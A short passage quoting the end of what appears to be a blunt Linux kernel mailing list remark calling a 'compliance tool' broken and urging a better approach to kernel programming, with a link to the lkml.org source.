"compliance tool", because it is obviously broken. And fix your approach to kernel programming. Linus Sursa: https://lkml.org/lkml/2012/12/23/75